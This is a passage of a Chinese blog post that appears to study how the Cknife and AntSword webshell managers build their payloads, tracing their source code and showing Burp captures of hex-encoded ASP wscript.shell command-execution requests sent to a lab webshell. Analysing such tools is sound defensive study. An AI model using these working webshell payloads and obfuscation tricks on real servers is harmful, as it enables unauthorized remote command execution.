class="hljs-string">&quot;On+Error+Resume+Next\:&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;%26bd(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;PAYLOAD&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;))\:Response.Write(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;|&lt;-&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;)\:Response.End&quot;</span><span class="hljs-string">&quot;)&quot;</span>)<br>ASP_SHELL=<span class="hljs-built_in">Set</span> X\=CreateObject(<span class="hljs-string">&quot;wscript.shell&quot;</span>).exec(<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&quot;</span>&amp;bd(Request(<span class="hljs-string">&quot;PARAM1&quot;</span>))&amp;<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot; /c &quot;</span><span class="hljs-string">&quot;&quot;</span>&amp;bd(Request(<span class="hljs-string">&quot;PARAM2&quot;</span>))&amp;<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&quot;</span>)\:If Err Then\:S\=<span class="hljs-string">&quot;[Err] &quot;</span>&amp;Err.Description\:Err.Clear\:Else\:O\=X.StdOut.ReadAll()\:E\=X.StdErr.ReadAll()\:S\=O&amp;E\:End If\:Response.write(S)<br>PARAM1=z1<br>PARAM2=z2<br><span class="hljs-comment">//生成所执行的命令：src\com\ms509\util\Shell.java</span><br>z1 = toHexString(z1);<br>z2 = toHexString(z2);<br>tmp = z1 + <span class="hljs-string">&quot;&amp;&quot;</span>+Safe.PARAM2+<span class="hljs-string">&quot;=&quot;</span> + z2;<br><span class="hljs-built_in">String</span> payload = Safe.ASP_SHELL.replace(<span class="hljs-string">&quot;PARAM1&quot;</span>, Safe.PARAM1).replace(<span class="hljs-string">&quot;PARAM2&quot;</span>, Safe.PARAM2);<br><span class="hljs-built_in">String</span> make = Safe.ASP_MAKE.replace(<span class="hljs-string">&quot;PAYLOAD&quot;</span>, toHexString(payload));<span class="hljs-comment">//payload转换为十六进制转换</span><br><span class="hljs-built_in">String</span> params = Safe.PASS + <span class="hljs-string">&quot;=&quot;</span> + make + <span class="hljs-string">&quot;&amp;&quot;</span> + Safe.PARAM1 + <span class="hljs-string">&quot;=&quot;</span> + tmp;<br></code></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled%206.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="发送给服务器执行的命令"><a href="#发送给服务器执行的命令" class="headerlink" title="发送给服务器执行的命令"></a>发送给服务器执行的命令</h3><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs jsx"><span class="hljs-built_in">Set</span> X\=CreateObject(<span class="hljs-string">&quot;wscript.shell&quot;</span>).exec(<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&quot;</span>&amp;bd(Request(<span class="hljs-string">&quot;PARAM1&quot;</span>))&amp;<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot; /c &quot;</span><span class="hljs-string">&quot;&quot;</span>&amp;bd(Request(<span class="hljs-string">&quot;PARAM2&quot;</span>))&amp;<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&quot;</span>)\:<br>If Err Then\<br>	:S\=<span class="hljs-string">&quot;[Err] &quot;</span>&amp;Err.Description\:Err.Clear\:<br>Else\:<br>	O\=X.StdOut.ReadAll()\:<br>	E\=X.StdErr.ReadAll()\:<br>	S\=O&amp;E\:<br>End If\:<br>Response.write(S)<br></code></pre></td></tr></table></figure>

<h3 id="最终的流量"><a href="#最终的流量" class="headerlink" title="最终的流量"></a>最终的流量</h3><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs jsx"><span class="hljs-comment">//burp拦截的流量</span><br>POST /Assets/temp/hotspot/img/logohotspot.asp HTTP/<span class="hljs-number">1.1</span><br>User-Agent:  Mozilla/<span class="hljs-number">5.0</span> (Windows NT <span class="hljs-number">10.0</span>; Win64; x64) AppleWebKit/<span class="hljs-number">537.36</span> (KHTML, like Gecko) Chrome/<span class="hljs-number">73.0</span><span class="hljs-number">.3683</span><span class="hljs-number">.103</span> Safari/<span class="hljs-number">537.36</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br><span class="hljs-attr">Accept</span>: text/html, image/gif, image/jpeg, *; q=<span class="hljs-number">.2</span>, *<span class="hljs-comment">/*; q=.2</span><br><span class="hljs-comment">Content-type: application/x-www-form-urlencoded</span><br><span class="hljs-comment">Content-Length: 969</span><br><span class="hljs-comment">Connection: close</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">chopper=Execute(&quot;Execute(&quot;&quot;On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(&quot;&quot;&quot;&quot;-&gt;|&quot;&quot;&quot;&quot;):Execute(&quot;&quot;&quot;&quot;On+Error+Resume+Next:&quot;&quot;&quot;&quot;%26bd(&quot;&quot;&quot;&quot;44696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329&quot;&quot;&quot;&quot;)):Response.Write(&quot;&quot;&quot;&quot;|&lt;-&quot;&quot;&quot;&quot;):Response.End&quot;&quot;)&quot;)</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">//最终的cknife的payload在URL解码之后的结果</span><br><span class="hljs-comment">chopper=Execute(&quot;Execute(&quot;&quot;</span><br><span class="hljs-comment">	On Error Resume Next:</span><br><span class="hljs-comment">	Function bd(byVal s):</span><br><span class="hljs-comment">		For i=1 To Len(s) Step 2:</span><br><span class="hljs-comment">			c=Mid(s,i,2):</span><br><span class="hljs-comment">			If IsNumeric(Mid(s,i,1)) </span><br><span class="hljs-comment">				Then:Execute(&quot;&quot;&quot;&quot;bd=bd&amp;chr(&amp;H&quot;&quot;&quot;&quot;&amp;c&amp;&quot;&quot;&quot;&quot;)&quot;&quot;&quot;&quot;):</span><br><span class="hljs-comment">			Else:</span><br><span class="hljs-comment">				Execute(&quot;&quot;&quot;&quot;bd=bd&amp;chr(&amp;H&quot;&quot;&quot;&quot;&amp;c&amp;Mid(s,i+2,2)&amp;&quot;&quot;&quot;&quot;)&quot;&quot;&quot;&quot;):</span><br><span class="hljs-comment">			i=i+2:</span><br><span class="hljs-comment">			End If</span><br><span class="hljs-comment">			&quot;&quot;&amp;chr(10)&amp;&quot;&quot;</span><br><span class="hljs-comment">		Next:</span><br><span class="hljs-comment">	End Function:</span><br><span class="hljs-comment">	Response.Write(&quot;&quot;&quot;&quot;-&gt;|&quot;&quot;&quot;&quot;):</span><br><span class="hljs-comment">	Execute(&quot;&quot;&quot;&quot;On Error Resume Next:&quot;&quot;&quot;&quot;</span><br><span class="hljs-comment">	&amp;bd(&quot;&quot;&quot;&quot;53657420583d4372656174654f626a6563742822777363726970742e7368656c6c22292e657865632822222222266264285265717565737428227a3122292926222222202f6320222222266264285265717565737428227a322229292622222222293a496620457272205468656e3a533d225b4572725d2022264572722e4465736372697074696f6e3a4572722e436c6561723a456c73653a4f3d582e5374644f75742e52656164416c6c28293a453d582e5374644572722e52656164416c6c28293a533d4f26453a456e642049663a526573706f6e73652e7772697465285329&quot;&quot;&quot;&quot;)):</span><br><span class="hljs-comment">	Response.Write(&quot;&quot;&quot;&quot;|&lt;-&quot;&quot;&quot;&quot;):</span><br><span class="hljs-comment">	Response.End&quot;&quot;)&quot;)</span><br><span class="hljs-comment">&amp;z1=636d64</span><br><span class="hljs-comment">&amp;z2=6364202f6420226e756c6c2226266563686f205b535d266364266563686f205b455d</span><br></code></pre></td></tr></table></figure>

<h3 id="学到的技巧"><a href="#学到的技巧" class="headerlink" title="学到的技巧"></a>学到的技巧</h3><ol>
<li>Cknife的paylaod保存在Config.ini文件中，只是在执行过程中完成动态拼接以及转码的过程</li>
</ol>
<h2 id="蚁剑"><a href="#蚁剑" class="headerlink" title="蚁剑"></a>蚁剑</h2><h3 id="命令生成-1"><a href="#命令生成-1" class="headerlink" title="命令生成"></a>命令生成</h3><ol>
<li>执行命令，调用<code>request</code>函数。<ol>
<li>request函数的第一个参数需要调用<code>this.core.command.exec()</code>函数生成命令执行code</li>
<li>exec()根据模板，将用户的cmd，env，bin拼接到对应的命令执行模板中</li>
</ol>
</li>
<li><code>request</code>函数调用<code>complete()</code>函数，并把上述code作为<code>complete()</code> 的第一个参数传递过去</li>
<li><code>complete(data)</code>函数调用<code>hexCode = formatter[&#39;hex&#39;](data[&#39;_&#39;])</code>  对code进行十六进制编码</li>
<li>将hex编码后的命令执行code拼接到最终的payload模板中</li>
<li>发宝</li>
</ol>
<blockquote>
<p>上述过程中，有些差错？我也只是模糊和朦胧之间把这个证据链拼凑完整，也许不完全正确，但是以我目前水平也只是觉得做到此。</p>
</blockquote>
<blockquote>
<p>跟踪流程的时候，①不会debug断点②手动跟的时候，感觉有点泛型？就是调用的时候如何特定指派ASP，php，jsp的payload逻辑等，还是模糊的</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><code class="hljs jsx"><span class="hljs-comment">//第一步：开始生成命令，调用request函数，request第一个参数的生成调用exec函数</span><br><span class="hljs-comment">//-&gt;source\modules\terminal\index.js</span><br>		<span class="hljs-comment">// 开始执行命令</span><br>    <span class="hljs-built_in">this</span><br>      .core<br>      .request(<span class="hljs-built_in">this</span>.core.command.exec(&#123;<br>        <span class="hljs-attr">cmd</span>: <span class="hljs-built_in">this</span>.parseCmd(cmd, <span class="hljs-built_in">this</span>.path),<br>        <span class="hljs-attr">bin</span>: _bin,<br>        <span class="hljs-attr">env</span>: <span class="hljs-built_in">Object</span>.keys(<span class="hljs-built_in">this</span>.asenvironmet).map(<span class="hljs-function">(<span class="hljs-params">k</span>) =&gt;</span> &#123;<br>          <span class="hljs-keyword">return</span> <span class="hljs-string">`<span class="hljs-subst">$&#123;k&#125;</span>|||askey|||<span class="hljs-subst">$&#123;<span class="hljs-built_in">this</span>.asenvironmet[k]&#125;</span>|||asline|||`</span>;<br>        &#125;).join(<span class="hljs-string">&#x27;&#x27;</span>),<br>      &#125;))<br><br><span class="hljs-comment">//第二步：exec函数生成对应的命令执行模板并返回</span><br><span class="hljs-comment">//-&gt;antSword-master\source\core\asp\template\command.js</span><br>	<span class="hljs-comment">//命令执行模板</span><br>	<span class="hljs-attr">exec</span>: &#123;<br>	    <span class="hljs-attr">_</span>: <span class="hljs-string">`Set PutEnv=CreateObject(&quot;WScript.Shell&quot;).Environment(&quot;Process&quot;):</span><br><span class="hljs-string">	    envstr=Split(&quot;&quot;&amp;bd(Request(&quot;<span class="hljs-subst">$&#123;arg3&#125;</span>&quot;))&amp;&quot;&quot;, &quot;|||asline|||&quot;):</span><br><span class="hljs-string">	    For Each envline in envstr:</span><br><span class="hljs-string">	      If Len(envline)&gt;0 Then:</span><br><span class="hljs-string">	        ss=Split(envline, &quot;|||askey|||&quot;):</span><br><span class="hljs-string">	        PutEnv(ss(0))=ss(1):</span><br><span class="hljs-string">	      End If:</span><br><span class="hljs-string">	    Next:</span><br><span class="hljs-string">	    Set X=CreateObject(&quot;wscript.shell&quot;).exec(&quot;&quot;&quot;&quot;&amp;bd(Request(&quot;<span class="hljs-subst">$&#123;arg1&#125;</span>&quot;))&amp;&quot;&quot;&quot; /c &quot;&quot;&quot;&amp;bd(Request(&quot;<span class="hljs-subst">$&#123;arg2&#125;</span>&quot;))&amp;&quot;&quot;&quot;&quot;):</span><br><span class="hljs-string">	    If Err Then:</span><br><span class="hljs-string">	      S=&quot;[Err] &quot;&amp;Err.Description:</span><br><span class="hljs-string">	      Err.Clear:</span><br><span class="hljs-string">	    Else:</span><br><span class="hljs-string">	      O=X.StdOut.ReadAll():</span><br><span class="hljs-string">	      E=X.StdErr.ReadAll():</span><br><span class="hljs-string">	      S=O&amp;E:</span><br><span class="hljs-string">	    End If:</span><br><span class="hljs-string">	    Response.write(S)`</span>.replace(<span class="hljs-regexp">/\n\s+/g</span>, <span class="hljs-string">&#x27;&#x27;</span>),<br>	    [arg1]: <span class="hljs-string">&quot;#&#123;hex::bin&#125;&quot;</span>,<br>	    [arg2]: <span class="hljs-string">&quot;#&#123;hex::cmd&#125;&quot;</span>,<br>	    [arg3]: <span class="hljs-string">&quot;#&#123;hex::env&#125;&quot;</span>,<br>	  &#125;<br><br><span class="hljs-comment">//第三步：request函数中调用complete函数，并把生成的命令执行code传递过去</span><br><span class="hljs-comment">//-&gt;antSword-master\source\core\base.js</span><br>		<span class="hljs-comment">/**</span><br><span class="hljs-comment">	   * HTTP请求函数</span><br><span class="hljs-comment">	   * ? 用法：core.request(core.base.info()).then((ret) =&gt; &#123;&#125;).catch((e) =&gt; &#123;&#125;)..</span><br><span class="hljs-comment">	   * <span class="hljs-doctag">@param  <span class="hljs-type">&#123;Object&#125;</span> </span>code          请求源数据</span><br><span class="hljs-comment">	   * <span class="hljs-doctag">@param  <span class="hljs-type">&#123;Function&#125;</span> </span>chunkCallBack 二进制流回调函数，可选</span><br><span class="hljs-comment">	   * <span class="hljs-doctag">@return <span class="hljs-type">&#123;Promise&#125;</span>               </span>Promise操作对象</span><br><span class="hljs-comment">	   */</span><br>	  <span class="hljs-function"><span class="hljs-title">request</span>(<span class="hljs-params">code, chunkCallBack</span>)</span> &#123;<br>	    <span class="hljs-keyword">const</span> opt = <span class="hljs-built_in">this</span>.complete(code);<br><br><span class="hljs-comment">//第四步：compete函数就是完成最终的命令拼接，传递的code赋值给data变量，然后对code进行16进制编码，</span><br><span class="hljs-comment">//最终把hex过的code拼接到payload当中发送</span><br><span class="hljs-comment">//-&gt;\antSword-master\source\core\asp\index.js</span><br>	<span class="hljs-comment">/**</span><br><span class="hljs-comment">   * HTTP请求数据组合函数</span><br><span class="hljs-comment">   * <span class="hljs-doctag">@param  <span class="hljs-type">&#123;Object&#125;</span> </span>data 通过模板解析后的代码对象</span><br><span class="hljs-comment">   * <span class="hljs-doctag">@return <span class="hljs-type">&#123;Promise&#125;</span>     </span>返回一个Promise操作对象</span><br><span class="hljs-comment">   */</span><br>  <span class="hljs-function"><span class="hljs-title">complete</span>(<span class="hljs-params">data, force_default = <span class="hljs-literal">false</span></span>)</span> &#123;<br>		<span class="hljs-comment">// 分隔符号</span><br>		tag_s = <span class="hljs-built_in">Math</span>.random().toString(<span class="hljs-number">16</span>).substr(<span class="hljs-number">2</span>, <span class="hljs-built_in">parseInt</span>(<span class="hljs-built_in">Math</span>.random() * <span class="hljs-number">8</span> + <span class="hljs-number">5</span>)); <span class="hljs-comment">// &quot;-&gt;|&quot;;</span><br>		tag_e = <span class="hljs-built_in">Math</span>.random().toString(<span class="hljs-number">16</span>).substr(<span class="hljs-number">2</span>, <span class="hljs-built_in">parseInt</span>(<span class="hljs-built_in">Math</span>.random() * <span class="hljs-number">8</span> + <span class="hljs-number">5</span>)); <span class="hljs-comment">// &quot;|&lt;-&quot;;</span><br>		<span class="hljs-comment">// hex编码一次数据</span><br>		<span class="hljs-keyword">let</span> hexCode = formatter[<span class="hljs-string">&#x27;hex&#x27;</span>](data[<span class="hljs-string">&#x27;_&#x27;</span>]);<br>	    <span class="hljs-comment">// 组合完整的代码</span><br>		data[<span class="hljs-string">&#x27;_&#x27;</span>] = <span class="hljs-string">`eval(&quot;Ex&quot;&amp;cHr(101)&amp;&quot;cute(&quot;&quot;Server.ScriptTimeout=3600:On Error Resume Next:</span><br><span class="hljs-string">				Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:</span><br><span class="hljs-string">				xecute(&quot;&quot;&quot;&quot;bd=bd&amp;chr(&amp;H&quot;&quot;&quot;&quot;&amp;c&amp;&quot;&quot;&quot;&quot;)&quot;&quot;&quot;&quot;):Else:Execute(&quot;&quot;&quot;&quot;bd=bd&amp;chr(&amp;H&quot;&quot;&quot;&quot;&amp;c&amp;Mid(s,i+2,2)&amp;&quot;&quot;&quot;&quot;)&quot;&quot;&quot;&quot;):i=i+2:</span><br><span class="hljs-string">				End If&quot;&quot;&amp;chr(10)&amp;&quot;&quot;Next:End Function:</span><br><span class="hljs-string">				Response.Write(&quot;&quot;&quot;&quot;<span class="hljs-subst">$&#123;tag_s.substr(<span class="hljs-number">0</span>,tag_s.length<span class="hljs-regexp">/2)&#125;&quot;&quot;&quot;&quot;&amp;&quot;&quot;&quot;&quot;$&#123;tag_s.substr(tag_s.length/</span><span class="hljs-number">2</span>)&#125;</span>&quot;&quot;&quot;&quot;):</span><br><span class="hljs-string">				Ex&quot;&amp;cHr(101)&amp;&quot;cute(&quot;&quot;&quot;&quot;On Error Resume Next:&quot;&quot;&quot;&quot;&amp;bd(&quot;&quot;&quot;&quot;<span class="hljs-subst">$&#123;hexCode&#125;</span>&quot;&quot;&quot;&quot;)):Response.Write(&quot;&quot;&quot;&quot;<span class="hljs-subst">$&#123;tag_e.substr(<span class="hljs-number">0</span>,tag_e.length<span class="hljs-regexp">/2)&#125;&quot;&quot;&quot;&quot;&amp;&quot;&quot;&quot;&quot;$&#123;tag_e.substr(tag_e.length/</span><span class="hljs-number">2</span>)&#125;</span>&quot;&quot;&quot;&quot;):</span><br><span class="hljs-string">				Response.End&quot;&quot;)&quot;)`</span>;<br>	&#125;<br></code></pre></td></tr></table></figure>

<h3 id="发送给服务器执行的命令-1"><a href="#发送给服务器执行的命令-1" class="headerlink" title="发送给服务器执行的命令"></a>发送给服务器执行的命令</h3><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs jsx"><span class="hljs-built_in">Set</span> PutEnv=CreateObject(<span class="hljs-string">&quot;WScript.Shell&quot;</span>).Environment(<span class="hljs-string">&quot;Process&quot;</span>):<br>envstr=Split(<span class="hljs-string">&quot;&quot;</span>&amp;bd(Request(<span class="hljs-string">&quot;$&#123;arg3&#125;&quot;</span>))&amp;<span class="hljs-string">&quot;&quot;</span>, <span class="hljs-string">&quot;|||asline|||&quot;</span>):<br>For Each envline <span class="hljs-keyword">in</span> envstr:<br>  If Len(envline)&gt;<span class="hljs-number">0</span> Then:<br>    ss=Split(envline, <span class="hljs-string">&quot;|||askey|||&quot;</span>):<br>    PutEnv(ss(<span class="hljs-number">0</span>))=ss(<span class="hljs-number">1</span>):<br>  End If:<br>Next:<br><span class="hljs-built_in">Set</span> X=CreateObject(<span class="hljs-string">&quot;wscript.shell&quot;</span>).exec(<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&quot;</span>&amp;bd(Request(<span class="hljs-string">&quot;$&#123;arg1&#125;&quot;</span>))&amp;<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot; /c &quot;</span><span class="hljs-string">&quot;&quot;</span>&amp;bd(Request(<span class="hljs-string">&quot;$&#123;arg2&#125;&quot;</span>))&amp;<span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;&quot;</span>):<br>If Err Then:<br>  S=<span class="hljs-string">&quot;[Err] &quot;</span>&amp;Err.Description:<br>  Err.Clear:<br>Else:<br>  O=X.StdOut.ReadAll():<br>  E=X.StdErr.ReadAll():<br>  S=O&amp;E:<br>End If:<br>Response.write(S)<br></code></pre></td></tr></table></figure>

<h3 id="最终流量"><a href="#最终流量" class="headerlink" title="最终流量"></a>最终流量</h3><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs jsx"><span class="hljs-comment">//burp捕获到的流量</span><br>POST /Assets/temp/hotspot/img/logohotspot.asp HTTP/<span class="hljs-number">1.1</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br>Accept-Encoding: gzip, deflate<br>User-Agent: Opera/<span class="hljs-number">9.80</span> (X11; Linux i686; U; ja) Presto/<span class="hljs-number">2.7</span><span class="hljs-number">.62</span> Version/<span class="hljs-number">11.01</span><br>Content-Type: application/x-www-form-urlencoded<br>Content-Length: <span class="hljs-number">2047</span><br><span class="hljs-attr">Connection</span>: close<br><br>c498f64f149e9d=&amp;chopper=<span class="hljs-built_in">eval</span>(%22Ex%<span class="hljs-number">22</span>%26cHr(<span class="hljs-number">101</span>)%<span class="hljs-number">26</span>%22cute(%<span class="hljs-number">22</span>%22Server.ScriptTimeout%3D3600%3AOn%20<span class="hljs-built_in">Error</span>%20Resume%20Next%3AFunction%20bd(byVal%20s)%3AFor%20i%3D1%20To%20Len(s)%20Step%<span class="hljs-number">202</span>%3Ac%3DMid(s%2Ci%2C2)%3AIf%20IsNumeric(Mid(s%2Ci%2C1))%20Then%3AExecute(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%22bd%3Dbd%26chr(%26H%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%26c%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%3AElse%3AExecute(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%22bd%3Dbd%26chr(%26H%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%26c%26Mid(s%2Ci%2B2%2C2)%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%3Ai%3Di%2B2%3AEnd%20If%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%26chr(<span class="hljs-number">10</span>)%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%22Next%3AEnd%20<span class="hljs-built_in">Function</span>%3AResponse.Write(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22499</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%22be0e%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%3AEx%<span class="hljs-number">22</span>%26cHr(<span class="hljs-number">101</span>)%<span class="hljs-number">26</span>%22cute(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%22On%20<span class="hljs-built_in">Error</span>%20Resume%20Next%3A%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%26bd(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%2253657420507574456E763D4372656174654F626A6563742822575363726970742E5368656C6C22292E456E7669726F6E6D656E74282250726F6365737322293A656E767374723D53706C69742822222662642852657175657374282263343938663634663134396539642229292622222C20227C7C7C61736C696E657C7C7C22293A466F72204561636820656E766C696E6520696E20656E767374723A4966204C656E28656E766C696E65293E30205468656E3A73733D53706C697428656E766C696E652C20227C7C7C61736B65797C7C7C22293A507574456E76287373283029293D73732831293A456E642049663A4E6578743A53657420583D4372656174654F626A6563742822777363726970742E7368656C6C22292E65786563282222222226626428526571756573742822746533333937393739396339633222292926222222202F6320222222266264285265717565737428226F643631663338333930653565372229292622222222293A496620457272205468656E3A533D225B4572725D2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A4F3D582E5374644F75742E52656164416C6C28293A453D582E5374644572722E52656164416C6C28293A533D4F26453A456E642049663A526573706F6E73652E7772697465285329%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>))%3AResponse.Write(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%222d40%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">224432</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%3AResponse.End%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%<span class="hljs-number">22</span>)&amp;od61f38390e5e7=6364202F642022433A2F50726F6772616D2046696C65732F525A4B2F466F7274696C6F676765722F5765622F4173736574732F74656D702F686F7473706F742F696D67222677686F616D69266563686F20626237353136266364266563686F203065316130303330&amp;te33979799c9c2=636D64<br><br><span 